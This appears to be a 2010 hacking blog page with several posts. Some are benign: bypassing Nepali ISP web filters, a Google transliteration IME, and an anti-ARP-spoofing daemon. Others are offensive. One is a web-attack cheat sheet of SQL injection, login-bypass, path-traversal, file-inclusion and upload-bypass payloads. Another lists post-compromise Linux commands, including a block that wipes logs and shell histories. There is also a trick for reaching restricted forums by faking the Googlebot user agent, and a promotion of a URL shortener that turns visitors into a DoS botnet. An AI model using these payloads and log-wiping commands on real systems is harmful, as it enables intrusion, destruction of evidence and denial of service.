Sunday, 26 December 2010

Bypass web filters of Nepali ISPs

Well okay, I am here to rescue you if you are facing the problem of finding the website you want to visit getting blocked by the ISPs. After NTA sent the letters to the ISPs in Nepal to block the sites with some potentially bad contents, ISPs have started doing filtering and blocking of the websites. In this post, I am going to show you how to bypass the web filters being applied by the ISPs. I've tested with the websurfer ISP but still you might find one of these ways working for you.

Method #1:
So I assume you are searching for some stuffs in the torrent and lets say your search query goes to the URL.
For example, I search for sex comedy movie in torrentz.eu, the search query would result in a URL like:
http://torrentz.eu/search?f=sex+comedy+movie

Unfortunately websurfer blocks the keywork sex from the URL query so we get the page like below:


Now lets change our query by searching with the caps version of sex i.e. SEX to bypass such filtering. The new URL after entering search keywords would be:

http://torrentz.eu/search?f=SEX+comedy+movie

And this time you get the valid webpage with your expected search results. Wasn't that easy bypassing this lame blocking?
Method #2:
I was checking the lists of the websites which were being blocked by Nepali ISPs and my eyes caught utube.com and I tried opening it. But it was another site to be blocked.
Check the screenshot below:



This time I am using the internet protocol address (IP Address of the website) to visit the website. In order to find the IP of any website, you can simply do:

ping utube.com

This will give you the IP of the website. For utube.com, the associated IP was 67.192.184.210 so now on your browser, type the address of the website as http://67.192.184.210 and that would bypass and open the website.



Method #3:
Using proxy
While this tends to be slow for me, you can use the freely available proxies to bypass the web filters. I will leave this technique to do on your own as there are hundreds of tutorials on how to use proxies. Anyway, I leave you with the site called Samair.ru which consists of tons of proxies to be used.

Also, you might try installing the TOR software in your system(works pretty well for me).


Method #4:
Another way is to use the alternative DNS servers which will work perfectly if the ISP is blocking the websites based on DNS resolutions. You can use the DNS servers from OpenDNS or Google or you may google for other free DNS servers. Be sure to choose the good DNS server while doing so. The good thing about OpenDNS is that it also provides anti-phishing protection that your ISP might not be providing.

Google's DNS IPs: 8.8.8.8 and 8.8.4.4
OpenDNS IPs: 208.67.220.220 and 208.67.222.222

You can then set up the DNS servers either in router or your PC as required.

Method #5 and more:
I will update this post when I test things more and more. I haven't tested with VPNs, google cache, translators, etc. These days, ISPs are also blocking the websites by combining the above discussed methods further aided by the deep packet inspection.

I hope this helps some of you out there. Thanks.

Read more...

Web Hacking for Beginners and Intermediates

This is the article I posted on the secworm contest and I am now posting this in my blog. Its not that well written due to the lack of time but still will help some of you out there.

Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article as there would be surely lots of grammatical errors in this article.

This article is not an article about teaching the basics of any web hacking techniques. Instead, it is the document of tips and tricks that the beginners and intermediates can make use of in order to attack the web applications on certain scenarios. I assume that you know the basics of the web hacking techniques or you could google for learning the basics. I'll be covering the tricks on different web hacking methods such as SQL injection(MySQL basically), insecure file inclusions, insecure file upload, etc. As already stated, the article won't be about basic but rather would present you few useful tricks that might be useful in the course of web-app pentesting.

SQL Injection:
Comments: - - , /* , #
MySQL version: SELECT @@version

Current SQL User: SELECT user()
SELECT system_user()

Current Database: SELECT database()

MySQL Data directory(location of MySQL data files): SELECT @@datadir

List all MySQL users: SELECT host, user, password FROM mysql.user

Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char

Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.

Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
quote bypassing seems not working here. The path can't be encoded using the quote or char so we can't bypass the quote in this case.

Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)

unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--

Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter
0%a0union%a0select%091

XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>

Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
In the username field and random password, it would bypass the vulnerable authentication login.

' /*or*/ 1='1 –Bypasses or filter


File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php


including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd

path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd

Nullbyte injection
test.php?page=../../../../../etc/passwd

Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/

PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php

Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this, http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache Log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. Also you should try including everything you can such as the session files, uploaded files, etc. For the apache log injection, you'll have to telnet and send the GET request for arbitrary PHP code like Get / Few apache log locations to try are as below:

Useragent
test.php?page=../../../../../../../proc/self/environ
Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.

Check existence of folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically using the path traversal method.

File upload:
Nullbyte injection: If only valid extensions(such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg which will bypass the file upload security check.

PHP code within image: Sometimes the uploads are not checked for the file extension but for dimensions of images. This again can be bypassed by injecting PHP codes in the valid images and renaming them to .php file. The tool named edjpgcom can be used in order to inject the PHP code as JPEG comments in the images.

Header bypass: Again sometimes the developer just relies on the header information that contains the type of the file like “image/jpeg” for jpeg image. But since this is passed from client side, it can be modified using the tools such as tamper data or live http headers.

Also, the file upload feature can be exploited in union with the file inclusion vulnerability. If you have a site vulnerable to the file inclusion but not vulnerable to the insecure file upload, you can upload valid image as said in second method here and then you can include that file with the file inclusion vulnerable PHP script.

As said earlier, this article is not about giving you every steps of how to exploit the web vulnerabilities.



Read more...

Friday, 24 December 2010

Browsing the restricted forums without registering

Well it has worked for me and I am posting how you can browse the restricted forums by misusing the SEO things(I guess). A website traffic hugely depends upon the google search and hence most of the websites allow the google bot to crawl and index their pages for appearing in the search result. Now the google bot useragent is allowed to crawl any restricted forum and hence they can index those pages.

The requirement is the useragent switcher add-on for firefox which can be downloaded from HERE. Install this addon and restart it.

Now in the firefox menu, under tools, you will see a new option Default User Agent from where you can choose different user agents and add new user agents. Among the available user agents, you will find the Google Bot 2.1 useragent under the Search Robots option. Choose the Google Bot 2.1 as your default user agent and now start visiting the forums that were asking you to register. It will also work on other types of websites which usually require login. I hope this helps you. Thanks :)

Read more...

Few useful commands to use on rooted Linux box

So I was just reading my backups and came across this text file and with the hope that this might be helpful, I am posting the list of few useful linux commands that you might be using after rooting a Linux box. Also, I am not responsible for anything and neither is the original author. Use the commands properly with the proper knowledge.

cat ./../mainfile.php - Config file.
ls -la - Lists directory's.
ifconfig {eth0 etc} - Ipconfig equiv.
ps aux - Show running proccess's.
gcc in_file -o out_file - Compile c file.
cat /etc/passwd - List's accounts.
sudo - Superuser Do run a command as root provided you have perms
in /etc/sudoers.
id - Tells you what user your logged in as.
which wget curl w3m lynx - Check's to see what downloaders are
present.
uname -r - Shows all release info (or) cat /etc/release.
uname -a - Shows all kernal info (or) cat /etc/issue
last -30 - Last logged 30 ip's can change to desired number.
useradd - Create new user account.
usermod - Modify user account.
w - See who is currently logged on.
locate password.txt - Locates password.txt in current dur can use *.
rm -rf / - Please be carefull with this command, i cannot stress this
enough.
arp -a - Lists other machines are on the same subnet.
lsattr -va - ls file attributes on linux second extended file system
find / -type f -perm -04000 -ls - Finds suid files.
find . -type f -perm -04000 -ls - Finds suid files in current dir.
find / -type f -perm -02000 -ls - Finds all sgid files.
find / -perm -2 -ls - Finds all writable files and folders.
find . -perm -2 -ls - Finds all writable files and folders in current dir.
find / -type f -name .bash_history - Finds bash history.
netstat -an | grep -i listen - shows open ports.
cut -d: -f1,2,3 /etc/passwd | grep :: - From memory creates a user
with no pass.
find /etc/ -type f -perm -o+w 2> /dev/null - Write in /etc/passwd?.
cat /proc/version /proc/cpuinfo - Cpu info.
locate gcc- Finds gcc if installed.
set - Display system variables.
echo $path- Echo current path.
lsmod- Dumps kernal modules.
mount/df- Check mounted file system.
rpm -qa- Check patch level for RedHat 7.0.
dmesg- Check hardware ino.
cat /etc/syslog.conf - Log file.
uptime - Uptime check.
cat /proc/meminfo - Memory check.
find / -type f -perm -4 -print 2> /dev/null- Find readble files.
find / -type f -perm -2 -print 2> /dev/null - Find writable files.
chmod ### $folder - Chmod folder.
ls -l -b - Verbosly list directory's

-------------clear-logs-----------------

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c

find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;


Read more...

Thursday, 23 December 2010

d0z.me: the Evil URL Shortener

Many of you might have heard about LOIC which has been used by kids to DDoS attack the sites. Now, the creative hacker Ben Schmidt (supernothing) of spareclockcycles.org has implemented the JS LOIC in order to use it for the DoS attacks.

Whenever the users visit the shortened URLs from d0z.me, the website being visited will be constantly sent the HTTP requests everytime, thus creating the DoS condition. So this can be utilized to create the botnet for the DDoS attack. Why not read the post from Ben Schmidt himself?

d0z.me: The Evil URL Shortener

d0z.me website

Read more...

Sunday, 12 December 2010

Google Input Method: Type anywhere in your language

Google Transliteration IME is an input method editor which allows users to enter text in one of the supported languages using a roman keyboard. Users can type a word the way it sounds using Latin characters and Google Transliteration IME will convert the word to its native script. Note that this is not the same as translation -- it is the sound of the words that is converted from one alphabet to the other, not their meaning. Converted content will always be in Unicode.

Google Transliteration IME is currently available for 22 different languages - Amharic, Arabic, Bengali, Farsi (Persian), Greek, Gujarati, Hebrew, Hindi, Kannada, Malayalam, Marathi, Nepali, Oriya, Punjabi, Russian, Sanskrit, Serbian, Sinhalese, Tamil, Telugu, Tigrinya and Urdu.

You can download Google IME from the link below:

Google IME

Read more...

Saturday, 11 December 2010

Safe URL shortening with Saf.li

Recently, there have been lots of misuse of the popular URL shortening services in order to infect the users with the malwares. I've been hating these URL shortening services but now Saf.li has arrived as a safe alternative for these URL shortening services.

Saf.li service checks the link for the malicious content using the Bitdefender antivirus. When using saf.li for URL shortening you get the added benefit of antivirus and antiphishing scans, which allow you and your friends to safely share content over the Internet. A saf.li check on your URL means that all those who are going to use it are safe from malware and from personal data theft attempts.

Saf.li

Read more...

Avoiding the Man In The Middle through ARP Spoofing/Poisoning

ArpON (Arp handler inspectiON) is a portable handler daemon that make ARP secure in order to avoid the Man In The Middle through ARP Spoofing/Poisoning. It detects and blocks also Man In The Middle through ARP Spoofing/Poisoning for DHCP Spoofing, DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking & co attacks.

This is possible using two kinds of anti ARP Poisoning tecniques: the first is based on SARPI or "Static Arp Inspection" the second on DARPI or "Dynamic Arp Inspection" approach. SARPI and DARPI protects both unidirectional, bidirectional and distributed attacks.

Into "Unidirectional protection" is required that ArpON is installed and running on one node of the connection attacked. Into "Bidirectional protection" is required that ArpON is installed and running on two nodes of the connection attacked. Into "Distributed protection" is required that ArpON is installed and running on all nodes of the connections attacked. All other nodes whitout ArpON will not be protected from attack.

ArpON is therefore a host-based solution that doesn't modify ARP's standard base protocol, but rather sets precise policies by using SARPI for static networks and DARPI for dynamic networks (DHCP) thus making today's standardized protocol working and secure from any foreign intrusion.

Third party solutions exist, but all of them have some weaknesses, weaknesses which aren't present in ArpON.
Some examples:

1) Arpwatch: detects foreign intrusions but doesn't block them;
2) S-Arp (Secure ARP) slows down the protocol by injecting additional headers, encrypting communication and thus requiring more computational power;
3) DAI (Dynamic ARP inspection) from Cisco, ProCurve, Extreme Networks, Dlink and Allied Telesis slows down the protocol by making multiple DHCP server interrogations (DHCP Snooping) thus requiring more computational power;
4) IEEE 802.1AE, slows down the protocol by making massive use of encryption thus requiring more computational power.

Keep in mind other common tools fighting ARP poisoning usually limit their activity only to point out the problem instead of blocking it, ArpON does it using SARPI and DARPI policies. Finally you can use ArpON to pentest some switched/hubbed LAN with/without DHCP protocol, in fact you can disable the daemon in order to use the tools to poison the ARP cache.

Features:
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning attacks in statically configured networks;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning attacks in dinamically configured (DHCP) networks;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for DHCP Spoofing attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for DNS Spoofing attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for WEB Spoofing attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for Session Hijacking attack;
- It detects and blocks Man In The Middle through ARP Spoofing/Poisoning for SSL/TLS Hijacking attack;
- It detects and blocks unidirectional, bidirectional and distributed attacks;
- Doesn't affect the communication efficiency of Arp protocol;
- Multithreading on all OS supported (Pthread lib);
- It manages the network interface into unplug, boot, hibernation and suspension OS features;
- It works in userspace for OS portability reasons;
- Easily configurable via command line switches, provided that you have root permissions;
- It replaces Arpwatch, DAI (Dynamic ARP Inspection), S-ARP (Secure-ARP), IEEE 802.1AE & co;
- Tested against Ettercap, Cain & Abel, dsniff and other tools.

Download ArpON

Read more...